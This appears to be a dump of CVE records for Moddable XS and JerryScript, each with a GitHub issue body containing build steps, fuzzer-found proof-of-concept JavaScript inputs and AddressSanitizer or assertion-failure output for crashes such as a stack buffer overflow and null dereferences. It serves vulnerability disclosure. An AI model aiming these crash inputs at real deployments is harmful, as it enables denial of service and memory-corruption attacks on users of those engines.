##### Moddable-XS revision Commit: [2f93df29](https://github.com/Moddable-OpenSource/moddable/commit/2f93df297782cf0a31c1797b246becbf5e546f4f) Version: 11.5.0 32 4 ##### Build environment Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ##### Build steps ```bash cd ~/moddable/xs/makefiles/lin #debug make -f xst.mk ``` ##### Test case ```javascript //# sourceMappingURL=data:application/json;charset=utf-8;base64,eyJ2ZXJzaW9uIjozLCJzb3VyY2VzIjpbIndlYnBhY2s6Ly8vd2VicGFjay9ib290c3RyYXAgNDJlMDQyN2ExYTZlMzk3NTdjOGMiLCJ3ZWJwYWNrOi8vLy4vY29kZV9pbmxpbmVfb3JpZ2luYWwuanMiXSwibmFtZXMiOltdLCJtYXBwaW5ncyI6IjtBQUFBO0FBQ0E7O0FBRUE7QUFDQTs7QUFFQTtBQUNBO0FBQ0E7QUFDQTtBQUNBO0FBQ0E7QUFDQTtBQUNBO0FBQ0E7QUFDQTs7QUFFQTtBQUNBOztBQUVBO0FBQ0E7O0FBRUE7QUFDQTtBQUNBOzs7QUFHQTtBQUNBOztBQUVBO0FBQ0E7O0FBRUE7QUFDQSxtREFBMkMsY0FBYzs7QUFFekQ7QUFDQTtBQUNBO0FBQ0E7QUFDQTtBQUNBO0FBQ0E7QUFDQSxhQUFLO0FBQ0w7QUFDQTs7QUFFQTtBQUNBO0FBQ0E7QUFDQSxtQ0FBMkIsMEJBQTBCLEVBQUU7QUFDdkQseUNBQWlDLGVBQWU7QUFDaEQ7QUFDQTtBQUNBOztBQUVBO0FBQ0EsOERBQXNELCtEQUErRDs7QUFFckg7QUFDQTs7QUFFQTtBQUNBOzs7Ozs7OztBQ2hFQTtBQUNBOztBQUVBO0FBQ0E7QUFDQTs7QUFFQTs7QUFFQTtBQUNBO0FBQ0E7O0FBRUEiLCJmaWxlIjoiY29kZV9pbmxpbmVfYnVuZGxlLmpzIiwic291cmNlc0NvbnRlbnQiOlsiIFx0Ly8gVGhlIG1vZHVsZSBjYWNoZVxuIFx0dmFyIGluc3RhbGxlZE1vZHVsZXMgPSB7fTtcblxuIFx0Ly8gVGhlIHJlcXVpcmUgZnVuY3Rpb25cbiBcdGZ1bmN0aW9uIF9fd2VicGFja19yZXF1aXJlX18obW9kdWxlSWQpIHtcblxuIFx0XHQvLyBDaGVjayBpZiBtb2R1bGUgaXMgaW4gY2FjaGVcbiBcdFx0aWYoaW5zdGFsbGVkTW9kdWxlc1ttb2R1bGVJZF0pIHtcbiBcdFx0XHRyZXR1cm4gaW5zdGFsbGVkTW9kdWxlc1ttb2R1bGVJZF0uZXhwb3J0cztcbiBcdFx0fVxuIFx0XHQvLyBDcmVhdGUgYSBuZXcgbW9kdWxlIChhbmQgcHV0IGl0IGludG8gdGhlIGNhY2hlKVxuIFx0XHR2YXIgbW9kdWxlID0gaW5zdGFsbGVkTW9kdWxlc1ttb2R1bGVJZF0gPSB7XG4gXHRcdFx0aTogbW9kdWxlSWQsXG4gXHRcdFx0bDogZmFsc2UsXG4gXHRcdFx0ZXhwb3J0czoge31cbiBcdFx0fTtcblxuIFx0XHQvLyBFeGVjdXRlIHRoZSBtb2R1bGUgZnVuY3Rpb25cbiBcdFx0bW9kdWxlc1ttb2R1bGVJZF0uY2FsbChtb2R1bGUuZXhwb3J0cywgbW9kdWxlLCBtb2R1bGUuZXhwb3J0cywgX193ZWJwYWNrX3JlcXVpcmVfXyk7XG5cbiBcdFx0Ly8gRmxhZyB0aGUgbW9kdWxlIGFzIGxvYWRlZFxuIFx0XHRtb2R1bGUubCA9IHRydWU7XG5cbiBcdFx0Ly8gUmV0dXJuIHRoZSBleHBvcnRzIG9mIHRoZSBtb2R1bGVcbiBcdFx0cmV0dXJuIG1vZHVsZS5leHBvcnRzO1xuIFx0fVxuXG5cbiBcdC8vIGV4cG9zZSB0aGUgbW9kdWxlcyBvYmplY3QgKF9fd2VicGFja19tb2R1bGVzX18pXG4gXHRfX3dlYnBhY2tfcmVxdWlyZV9fLm0gPSBtb2R1bGVzO1xuXG4gXHQvLyBleHBvc2UgdGhlIG1vZHVsZSBjYWNoZVxuIFx0X193ZWJwYWNrX3JlcXVpcmVfXy5jID0gaW5zdGFsbGVkTW9kdWxlcztcblxuIFx0Ly8gaWRlbnRpdHkgZnVuY3Rpb24gZm9yIGNhbGxpbmcgaGFybW9ueSBpbXBvcnRzIHdpdGggdGhlIGNvcnJlY3QgY29udGV4dFxuIFx0X193ZWJwYWNrX3JlcXVpcmVfXy5pID0gZnVuY3Rpb24odmFsdWUpIHsgcmV0dXJuIHZhbHVlOyB9O1xuXG4gXHQvLyBkZWZpbmUgZ2V0dGVyIGZ1bmN0aW9uIGZvciBoYXJtb255IGV4cG9ydHNcbiBcdF9fd2VicGFja19yZXF1aXJlX18uZCA9IGZ1bmN0aW9uKGV4cG9ydHMsIG5hbWUsIGdldHRlcikge1xuIFx0XHRpZighX193ZWJwYWNrX3JlcXVpcmVfXy5vKGV4cG9ydHMsIG5hbWUpKSB7XG4gXHRcdFx0T2JqZWN0LmRlZmluZVByb3BlcnR5KGV4cG9ydHMsIG5hbWUsIHtcbiBcdFx0XHRcdGNvbmZpZ3VyYWJsZTogZmFsc2UsXG4gXHRcdFx0XHRlbnVtZXJhYmxlOiB0cnVlLFxuIFx0XHRcdFx0Z2V0OiBnZXR0ZXJcbiBcdFx0XHR9KTtcbiBcdFx0fVxuIFx0fTtcblxuIFx0Ly8gZ2V0RGVmYXVsdEV4cG9ydCBmdW5jdGlvbiBmb3IgY29tcGF0aWJpbGl0eSB3aXRoIG5vbi1oYXJtb255IG1vZHVsZXNcbiBcdF9fd2VicGFja19yZXF1aXJlX18ubiA9IGZ1bmN0aW9uKG1vZHVsZSkge1xuIFx0XHR2YXIgZ2V0dGVyID0gbW9kdWxlICYmIG1vZHVsZS5fX2VzTW9kdWxlID9cbiBcdFx0XHRmdW5jdGlvbiBnZXREZWZhdWx0KCkgeyByZXR1cm4gbW9kdWxlWydkZWZhdWx0J107IH0gOlxuIFx0XHRcdGZ1bmN0aW9uIGdldE1vZHVsZUV4cG9ydHMoKSB7IHJldHVybiBtb2R1bGU7IH07XG4gXHRcdF9fd2VicGFja19yZXF1aXJlX18uZChnZXR0ZXIsICdhJywgZ2V0dGVyKTtcbiBcdFx0cmV0dXJuIGdldHRlcjtcbiBcdH07XG5cbiBcdC8vIE9iamVjdC5wcm90b3R5cGUuaGFzT3duUHJvcGVydHkuY2FsbFxuIFx0X193ZWJwYWNrX3JlcXVpcmVfXy5vID0gZnVuY3Rpb24ob2JqZWN0LCBwcm9wZXJ0eSkgeyByZXR1cm4gT2JqZWN0LnByb3RvdHlwZS5oYXNPd25Qcm9wZXJ0eS5jYWxsKG9iamVjdCwgcHJvcGVydHkpOyB9O1xuXG4gXHQvLyBfX3dlYnBhY2tfcHVibGljX3BhdGhfX1xuIFx0X193ZWJwYWNrX3JlcXVpcmVfXy5wID0gXCJcIjtcblxuIFx0Ly8gTG9hZCBlbnRyeSBtb2R1bGUgYW5kIHJldHVybiBleHBvcnRzXG4gXHRyZXR1cm4gX193ZWJwYWNrX3JlcXVpcmVfXyhfX3dlYnBhY2tfcmVxdWlyZV9fLnMgPSAwKTtcblxuXG5cbi8vIFdFQlBBQ0sgRk9PVEVSIC8vXG4vLyB3ZWJwYWNrL2Jvb3RzdHJhcCA0MmUwNDI3YTFhNmUzOTc1N2M4YyIsIi8qIEFueSBjb3B5cmlnaHQgaXMgZGVkaWNhdGVkIHRvIHRoZSBQdWJsaWMgRG9tYWluLlxuIGh0dHA6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL3B1YmxpY2RvbWFpbi96ZXJvLzEuMC8gKi9cblxuLy8gT3JpZ2luYWwgc291cmNlIGNvZGUgZm9yIHRoZSBpbmxpbmUgc291cmNlIG1hcCB0ZXN0LlxuLy8gVGhlIGdlbmVyYXRlZCBmaWxlIHdhcyBtYWRlIHdpdGhcbi8vICAgIHdlYnBhY2sgLS1kZXZ0b29sIGlubGluZS1zb3VyY2UtbWFwIGNvZGVfaW5saW5lX29yaWdpbmFsLmpzIGNvZGVfaW5saW5lX2J1bmRsZS5qc1xuXG5cInVzZSBzdHJpY3RcIjtcblxuZnVuY3Rpb24gZigpIHtcbiAgY29uc29sZS5sb2coXCJJJ20gYSBnb2xkZmlzaCB3aXRoIGEgbWVycnkgZmFjZVwiKTtcbn1cblxuZigpO1xuXG5cblxuLy8vLy8vLy8vLy8vLy8vLy8vXG4vLyBXRUJQQUNLIEZPT1RFUlxuLy8gLi9jb2RlX2lubGluZV9vcmlnaW5hbC5qc1xuLy8gbW9kdWxlIGlkID0gMFxuLy8gbW9kdWxlIGNodW5rcyA9IDAiXSwic291cmNlUm9vdCI6IiJ9 ``` ##### Execution & Output with ASAN ````bash $ xst poc.js ================================================================= ====ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffe2b073ce0 at pc 0x000000449adb bp 0x7ffe2b070e30 sp 0x7ffe2b0705e0 WRITE of size 4372 at 0x7ffe2b073ce0 thread T0 #0 0x449ada in __interceptor_strcat (/usr/local/bin/xst+0x449ada) #1 0x7df692 in fxLoadScript /root/moddable/xs/sources/xsPlatforms.c:403:4 #2 0xad2f99 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1385:21 #3 0xacfa83 in main /root/moddable/xs/tools/xst.c:281:8 #4 0x7fea1d53cbf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 #5 0x42ddc9 in _start (/usr/local/bin/xst+0x42ddc9) Address 0x7ffe2b073ce0 is located in stack of thread T0 at offset 4128 in frame #0 0xacdaef in main /root/moddable/xs/tools/xst.c:201 This frame has 4 object(s): [32, 4128) 'path' (line 204) [4256, 4300) '_creation' (line 244) <== Memory access at offset 4128 partially underflows this variable [4336, 4592) '__HOST_JUMP__' (line 261) <== Memory access at offset 4128 partially underflows this variable [4656, 4912) '__JUMP__' (line 264) <== Memory access at offset 4128 partially underflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow (/usr/local/bin/xst+0x449ada) in __interceptor_strcat Shadow bytes around the buggy address: 0x100045606740: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100045606750: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100045606760: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100045606770: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100045606780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x100045606790: 00 00 00 00 00 00 00 00 00 00 00 00[f2]f2 f2 f2 0x1000456067a0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 00 00 00 00 0x1000456067b0: 00 04 f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 0x1000456067c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000456067d0: 00 00 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 00 00 0x1000456067e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==77303==ABORTING ```` ##### No-ASAN Output ```bash SyntaxError: (host): invalid script *** stack smashing detected ***: <unknown> terminated [1] abort xst poc.js ``` Credits: Found by OWL337 team.

Stack-buffer-overflow (/usr/local/bin/xst+0x449ada) in __interceptor_strcat with ASAN

https://api.github.com/repos/Moddable-OpenSource/moddable/issues/760/comments

2021-12-28T10:22:58Z

2022-01-13T15:17:35Z

https://github.com/Moddable-OpenSource/moddable/issues/760

CVE-2021-46335

2022-01-20T22:15:08.553

Moddable SDK v11.5.0 was discovered to contain a NULL pointer dereference in the component fx_Function_prototype_hasInstance.

https://github.com/Moddable-OpenSource/moddable/issues/748

github.com

# Build environment - operating system: ubuntu20.04 - cimmit hash: db8f9735c20c07c189d7f4a0574e787d4a6669ea - compile command: ``` cd /pathto/moddable/xs/makefiles/lin make debug or make release ``` - test command: ``` ./xst poc ``` # poc ``` function assertThrows(code, type_opt, cause_opt) { if (typeof code === 'function') return code(); if (typeof code === 'string') return eval(code); } (function () { var F = {}; F[Symbol.hasInstance] = null; assertThrows || F ? 7160833982606838.000000: assertThrows(assertThrows, /[\WD]/i, /T61/); }()); (function () { var F = {}; F[Symbol.hasInstance] = function () { return undefined; }; print(0 instanceof F, false); F[Symbol.hasInstance] = function () { return null; }; print(0 instanceof F, false); F[Symbol.hasInstance] = function () { return true; }; print(0 instanceof F, true); }()); (function () { var F = {}; F[Symbol.hasInstance] = function () { throw new Error('always throws'); }; try { 0 instanceof F; } catch (e) { print(e.message, 'always throws'); } }()); (function () { var BC = function () { }; var bc = new BC(); var bound = BC.bind(); print(bound[Symbol.hasInstance](bc), true); print(bound[Symbol.hasInstance]([]), false); }()); print(Function.prototype[Symbol.hasInstance].call(Array, []), true); print(Function.prototype[Symbol.hasInstance].call({ "L0VB0": assertThrows }, { "getPrototypeOf": assertThrows }), false); print(Function.prototype[Symbol.hasInstance].call(Array, 0), false); (function () { 'use strict'; function F() { } assertThrows(function () { F[Symbol.hasInstance] = v => v; }, TypeError); }()); (function () { function F() { } var counter = 0; var proto = Object.getPrototypeOf(F); Object.setPrototypeOf(F, null); F[Symbol.hasInstance] = function (v) { ++counter; return true; }; Object.setPrototypeOf(F, proto); print(1 instanceof F); print(1, counter); }()); ``` - asan log ``` ================================================================= ==2131098==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000542885 bp 0x7ffc6530e8d0 sp 0x7ffc6530e8a0 T0) ==2131098==The signal is caused by a READ memory access. ==2131098==Hint: address points to the zero page. #0 0x542885 in fx_Function_prototype_hasInstance /home/sakura/moddable/xs/sources/xsFunction.c:546:11 #1 0x59b4b7 in fxRunID /home/sakura/moddable/xs/sources/xsRun.c:842:8 #2 0x5426e1 in fx_Function_prototype_call /home/sakura/moddable/xs/sources/xsFunction.c:526:2 #3 0x59b4b7 in fxRunID /home/sakura/moddable/xs/sources/xsRun.c:842:8 #4 0x5b50e2 in fxRunScript /home/sakura/moddable/xs/sources/xsRun.c:4766:4 #5 0x61567c in fxRunProgramFile /home/sakura/moddable/xs/tools/xst.c:1387:2 #6 0x60fbef in main /home/sakura/moddable/xs/tools/xst.c:281:8 #7 0x7f08b5c6e0b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16 #8 0x42e6bd in _start (/home/sakura/moddable/build/bin/lin/debug/xst+0x42e6bd) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /home/sakura/moddable/xs/sources/xsFunction.c:546:11 in fx_Function_prototype_hasInstance ==2131098==ABORTING ``` - release log ``` [] ~/sk-afl-js/moddable_workdir <main> ~/moddable/build/bin/lin/release/xst fuzz_output/fuzzer1/crashes/id:000021,sig:06,src:002188,op:\(null\),pos:0.js false false false false true true always throws always throws true true false false true true [2] 2105934 segmentation fault ~/moddable/build/bin/lin/release/xst ```

AddressSanitizer: Null pointer dereference in fx_Function_prototype_hasInstance

https://api.github.com/repos/Moddable-OpenSource/moddable/issues/748/comments

2021-12-13T06:47:02Z

2022-01-18T00:22:52Z

https://github.com/Moddable-OpenSource/moddable/issues/748

CVE-2021-46335

2022-01-20T22:15:08.553

Moddable SDK v11.5.0 was discovered to contain a NULL pointer dereference in the component fx_Function_prototype_hasInstance.

https://github.com/Moddable-OpenSource/moddable/issues/767

github.com

##### Moddable-XS revision Commit: [2f93df29](https://github.com/Moddable-OpenSource/moddable/commit/2f93df297782cf0a31c1797b246becbf5e546f4f) Version: 11.5.0 32 4 ##### Build environment Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ##### Build steps ```bash cd ~/moddable/xs/makefiles/lin make -f xst.mk ``` ##### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript function JSEtest() { }; JSEtest.prototype = Function.prototype; var obj = new JSEtest; try { obj.apply(); $ERROR('###'); } catch (e) { if (!(e instanceof new JSEtest)) { $ERROR('###'); } } ``` </code></pre> </details> ##### Execution & Output ```bash $ ./moddable/build/bin/lin/debug/xst poc.js AddressSanitizer:DEADLYSIGNAL ================================================================= ==16775==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x00000069f0da bp 0x7ffc5bbdaf10 sp 0x7ffc5bbdac70 T0) ==16775==The signal is caused by a READ memory access. ==16775==Hint: address points to the zero page. #0 0x69f0d9 in fx_Function_prototype_hasInstance /root/moddable/xs/sources/xsFunction.c:546:18 #1 0x84f3ca in fxRunID /root/moddable/xs/sources/xsRun.c:842:7 #2 0x8c98c0 in fxRunInstanceOf /root/moddable/xs/sources/xsRun.c:4396:2 #3 0x8bac67 in fxRunID /root/moddable/xs/sources/xsRun.c:3877:4 #4 0x8ceaac in fxRunScript /root/moddable/xs/sources/xsRun.c:4766:4 #5 0xad3231 in fxRunProgramFile /root/moddable/xs/tools/xst.c:1387:2 #6 0xacfa83 in main /root/moddable/xs/tools/xst.c:281:8 #7 0x7f729fce6bf6 in __libc_start_main /build/glibc-S9d2JN/glibc-2.27/csu/../csu/libc-start.c:310 #8 0x42ddc9 in _start (/usr/local/bin/xst+0x42ddc9) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /root/moddable/xs/sources/xsFunction.c:546:18 in fx_Function_prototype_hasInstance ==16775==ABORTING ``` Credits: Found by OWL337 team.

SEGV xs/sources/xsFunction.c:546:18 in fx_Function_prototype_hasInstance

https://api.github.com/repos/Moddable-OpenSource/moddable/issues/767/comments

2022-01-07T16:07:28Z

2022-01-12T02:26:40Z

https://github.com/Moddable-OpenSource/moddable/issues/767

CVE-2021-46336

2022-01-20T22:15:08.597

There is an Assertion 'opts & PARSER_CLASS_LITERAL_CTOR_PRESENT' failed at /parser/js/js-parser-expr.c(parser_parse_class_body) in JerryScript 3.0.0.

https://github.com/jerryscript-project/jerryscript/issues/4927

github.com

###### JerryScript revision Commit: [a6ab5e9](https://github.com/jerryscript-project/jerryscript/commit/a6ab5e9abed70cdedf9f4e9c1dc379eb762ebf64) Version: v3.0.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64) Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20 ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript function assert(a, b) { if (a != b) throw "FAIL"; } function JSEtest(script) { try { eval(script); } catch (e) { return e; } } assert(JSEtest("class C1 { async;constructor() { } }"), "SyntaxError: Cannot declare an async method named 'constructor'."); assert(JSEtest("class C1 { *constructor() { } }"), "SyntaxError: Cannot declare a generator function named 'constructor'."); assert(JSEtest("class C1 { async *constructor() { } }"), "SyntaxError: Cannot declare an async generator method named 'constructor'."); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./jerryscript/build/bin/jerry poc.js ICE: Assertion 'opts & PARSER_CLASS_LITERAL_CTOR_PRESENT' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_class_body):656. Error: ERR_FAILED_INTERNAL_ASSERTION [1] 31519 abort jerry poc.js ``` Credits: Found by OWL337 team.

Assertion 'opts & PARSER_CLASS_LITERAL_CTOR_PRESENT' failed at jerryscript/jerry-core/parser/js/js-parser-expr.c(parser_parse_class_body):656.

https://api.github.com/repos/jerryscript-project/jerryscript/issues/4927/comments

2022-01-04T06:06:49Z

2022-01-14T09:16:23Z

https://github.com/jerryscript-project/jerryscript/issues/4927

CVE-2021-46337

2022-01-20T22:15:08.640

There is an Assertion 'page_p != NULL' failed at /parser/js/js-parser-mem.c(parser_list_get) in JerryScript 3.0.0.

https://github.com/jerryscript-project/jerryscript/issues/4930

github.com

###### JerryScript revision Commit: [a6ab5e9](https://github.com/jerryscript-project/jerryscript/commit/a6ab5e9abed70cdedf9f4e9c1dc379eb762ebf64) Version: v3.0.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64) Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20 ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript var stringSet; class JSEtest { get #test262() { return 'get string'; } set #test262(param) { stringSet = param; } getPrivateReference() { return this.#test262; } setPrivateReference(value) {function this.#test262 = value; } }; var inst = new JSEtest(); assert.sameValue(inst.getPrivateReference(), 'get string'); inst.setPrivateReference('set string'); assert.sameValue(stringSet, 'set string'); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./jerryscript/build/bin/jerry poc.js ICE: Assertion 'page_p != NULL' failed at jerryscript/jerry-core/parser/js/js-parser-mem.c(parser_list_get):279. Error: ERR_FAILED_INTERNAL_ASSERTION [1] 36899 abort jerry poc.js ``` Credits: Found by OWL337 team.

Assertion 'page_p != NULL' failed at jerryscript/jerry-core/parser/js/js-parser-mem.c(parser_list_get):279.

https://api.github.com/repos/jerryscript-project/jerryscript/issues/4930/comments

2022-01-04T06:09:14Z

2022-01-14T09:14:04Z

https://github.com/jerryscript-project/jerryscript/issues/4930

CVE-2021-46338

2022-01-20T22:15:08.687

There is an Assertion 'ecma_is_lexical_environment (object_p)' failed at /base/ecma-helpers.c(ecma_get_lex_env_type) in JerryScript 3.0.0.

https://github.com/jerryscript-project/jerryscript/issues/4900

github.com

###### JerryScript revision Commit: [42523bd6](https://github.com/jerryscript-project/jerryscript/commit/42523bd6e2b114755498c9f68fd78545f9b33476) Version: v3.0.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --linker-flag=-fuse-ld=gold --profile=es2015-subset --stack-limit=20 ``` ASAN closed ###### Test case ```javascript var i = 0; var a = []; var JSEtest = []; JSEtest.__defineGetter__(0, function NaN() { if (i++ > 2) { return; } JSEtest.shift(); gc(); a.push(0); a.concat(JSEtest); }); JSEtest[0]; ``` ​ ###### Execution steps & Output ```bash $ ./jerryscript/build/bin/jerry poc.js ICE: Assertion 'ecma_is_lexical_environment (object_p)' failed at /home/f1yh0p/jerryscript/jerry-core/ecma/base/ecma-helpers.c(ecma_get_lex_env_type):291. Error: ERR_FAILED_INTERNAL_ASSERTION ``` Credits: Found by OWL337 team.

Assertion 'ecma_is_lexical_environment (object_p)' failed at ecma-helpers.c (ecma_get_lex_env_type).

https://api.github.com/repos/jerryscript-project/jerryscript/issues/4900/comments

2021-12-13T08:54:30Z

2022-01-12T02:04:14Z

https://github.com/jerryscript-project/jerryscript/issues/4900

CVE-2021-46339

2022-01-20T22:15:08.730

There is an Assertion 'lit_is_valid_cesu8_string (string_p, string_size)' failed at /base/ecma-helpers-string.c(ecma_new_ecma_string_from_utf8) in JerryScript 3.0.0.

https://github.com/jerryscript-project/jerryscript/issues/4935

github.com

###### JerryScript revision Commit: [a6ab5e9](https://github.com/jerryscript-project/jerryscript/commit/a6ab5e9abed70cdedf9f4e9c1dc379eb762ebf64) Version: v3.0.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64) Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20 ``` ###### Test case [poc-as.txt](https://github.com/jerryscript-project/jerryscript/files/7805680/poc-as.txt) ###### Execution steps & Output ```bash $ ./jerryscript/build/bin/jerry poc.js ICE: Assertion 'lit_is_valid_cesu8_string (string_p, string_size)' failed at jerryscript/jerry-core/ecma/base/ecma-helpers-string.c(ecma_new_ecma_string_from_utf8):371. Error: ERR_FAILED_INTERNAL_ASSERTION [1] abort jerry poc.js ``` Credits: Found by OWL337 team.

Assertion 'lit_is_valid_cesu8_string (string_p, string_size)' failed at jerryscript/jerry-core/ecma/base/ecma-helpers-string.c(ecma_new_ecma_string_from_utf8):371.

https://api.github.com/repos/jerryscript-project/jerryscript/issues/4935/comments

2022-01-04T06:17:32Z

2022-01-14T04:30:57Z

https://github.com/jerryscript-project/jerryscript/issues/4935

CVE-2021-46340

2022-01-20T22:15:08.777

There is an Assertion 'context_p->stack_top_uint8 == SCAN_STACK_TRY_STATEMENT || context_p->stack_top_uint8 == SCAN_STACK_CATCH_STATEMENT' failed at /parser/js/js-scanner.c(scanner_scan_statement_end) in JerryScript 3.0.0.

https://github.com/jerryscript-project/jerryscript/issues/4924

github.com

###### JerryScript revision Commit: [a6ab5e9](https://github.com/jerryscript-project/jerryscript/commit/a6ab5e9abed70cdedf9f4e9c1dc379eb762ebf64) Version: v3.0.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64) Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20 ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript id = async x => x, square = async ( (a)) => { y * y } ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./jerryscript/build/bin/jerry poc.js ICE: Assertion 'context_p->stack_top_uint8 == SCAN_STACK_TRY_STATEMENT || context_p->stack_top_uint8 == SCAN_STACK_CATCH_STATEMENT' failed at jerryscript/jerry-core/parser/js/js-scanner.c(scanner_scan_statement_end):2370. Error: ERR_FAILED_INTERNAL_ASSERTION [1] 2960 abort jerry poc.js ``` Credits: Found by OWL337 team.

Assertion 'context_p->stack_top_uint8 == SCAN_STACK_TRY_STATEMENT || context_p->stack_top_uint8 == SCAN_STACK_CATCH_STATEMENT' failed at jerryscript/jerry-core/parser/js/js-scanner.c(scanner_scan_statement_end):2370.

https://api.github.com/repos/jerryscript-project/jerryscript/issues/4924/comments

2022-01-04T06:04:22Z

2022-01-14T04:33:28Z

https://github.com/jerryscript-project/jerryscript/issues/4924

CVE-2021-46342

2022-01-20T22:15:08.827

There is an Assertion 'ecma_is_lexical_environment (obj_p) || !ecma_op_object_is_fast_array (obj_p)' failed at /jerry-core/ecma/base/ecma-helpers.c in JerryScript 3.0.0.

https://github.com/jerryscript-project/jerryscript/issues/4934

github.com

###### JerryScript revision Commit: [a6ab5e9](https://github.com/jerryscript-project/jerryscript/commit/a6ab5e9abed70cdedf9f4e9c1dc379eb762ebf64) Version: v3.0.0 ###### Build platform Ubuntu 18.04.5 LTS (Linux 4.19.128-microsoft-standard x86_64) Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64) ###### Build steps ```bash python ./tools/build.py --clean --debug --compile-flag=-fsanitize=address --compile-flag=-m32 --compile-flag=-g --strip=off --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20 ``` ###### Test case <details> <summary>poc.js</summary> <pre><code> ```javascript class JSEtest { static set #m(v) { this._v = v; } static setWithEval() { eval(' [1].#m = "Test262"'); } } class D { static set #m(v) { throw new Test262Error('should never be called'); } } JSEtest.setWithEval(); assert.sameValue(JSEtest._v, 'Test262'); assert.throws(TypeError, function () { JSEtest.getWithEval.call(D); }, 'invalid access to a static private getter'); ``` </code></pre> </details> ​ ###### Execution steps & Output ```bash $ ./jerryscript/build/bin/jerry poc.js ICE: Assertion 'ecma_is_lexical_environment (obj_p) || !ecma_op_object_is_fast_array (obj_p)' failed at jerryscript/jerry-core/ecma/base/ecma-helpers.c(ecma_find_named_property):621. Error: ERR_FAILED_INTERNAL_ASSERTION [1] 5397 abort jerry poc.js ``` Credits: Found by OWL337 team.

Assertion 'ecma_is_lexical_environment (obj_p) || !ecma_op_object_is_fast_array (obj_p)' failed at jerryscript/jerry-core/ecma/base/ecma-helpers.c(ecma_find_named_property):621.

https://api.github.com/repos/jerryscript-project/jerryscript/issues/4934/comments

2022-01-04T06:13:59Z

2022-01-14T09:13:03Z

https://github.com/jerryscript-project/jerryscript/issues/4934

CVE-2021-46343

2022-01-20T22:15:08.873

There is an Assertion 'context_p->token.type == LEXER_LITERAL' failed at /jerry-core/parser/js/js-parser-expr.c in JerryScript 3.0.0.

https://github.com/jerryscript-project/jerryscript/issues/4921

github.com

